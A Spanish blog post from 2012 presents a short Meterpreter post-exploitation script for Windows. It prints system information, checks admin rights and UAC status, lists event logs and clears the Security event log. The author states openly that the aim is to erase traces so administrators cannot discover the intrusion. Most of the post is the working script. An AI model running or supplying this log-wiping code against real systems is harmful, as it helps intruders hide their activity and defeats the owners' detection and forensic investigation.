12 dic 2012

Scripts de Meterpreter: More Maxins & evasión de eventos

El desarrollo de scripts para Meterpreter es algo que llama, y mucho, la atención de los auditores que se encargan de auditorías en proyectos. Hoy presentamos un script que utiliza más Mixins, y además, evitan que el sistema registre nuestras acciones eliminando dichas huellas, para que los administradores puedan descubrirlas.

Código

El código que vamos a tratar hoy es el siguiente:

#Autor: Pablo Gonzalez#Windows más maxinsif client.platform !~ /win32|win64/print_line "No compatible"raise Rex::Script::Completedelseprint_status("Hecho")end#Interacción con el objeto clientputsputs "Info: "info = @client.sys.config.sysinfo()puts "Equipo: "+info['Computer']puts "Sistema Operativo: "+info['OS']puts "Arquitectura: "+info['Architecture']puts "Idioma: "+info['System Language']puts# soy admin?puts "Soy admin?:"+is_admin?().to_s()# uac habilitado?puts "Sistema con UAC?:"+is_uac_enabled?().to_s()# eventlog enumeración maxinsputs eventlog_list()log = client.sys.eventlog.open('security')#client.sys.eventlog.clear('security')log.clear

En primer lugar el primer código se refiere al objeto client, con sus métodos client.sys.config.sysinfo(), el cual nos proporciona información sobre las propiedades del sistema vulnerado. Es realmente, mediante el uso del ejemplo, entender lo que se está realizando en esta parte del código. Después se utilizan los maxins, directamente, para comprobar si el usuario de Meterpreter es admin o no, o si el UAC está habilitado en la máquina vulnerada o no.

Por último, cabe destacar y mucho el maxin, eventlog_list(), con el que se obtiene un listado de tipos de eventos disponibles en el sistema. Por otro lado se utiliza el objeto client para abrir un tipo de eventos del sistema y limpiarlos, mediante el método clear de client.sys.eventlog. Es realmente útil todas estas acciones para evitar dejar ciertas huellas en el sistema, y pasar más desapercibido.

Hasta aquí el script de hoy, el cual es realmente sencillo de entender y poder poner en práctica, y recordad que en esto como en otras cosas de la vida, el límite es tu imaginación ;)

No hay comentarios:

Publicar un comentario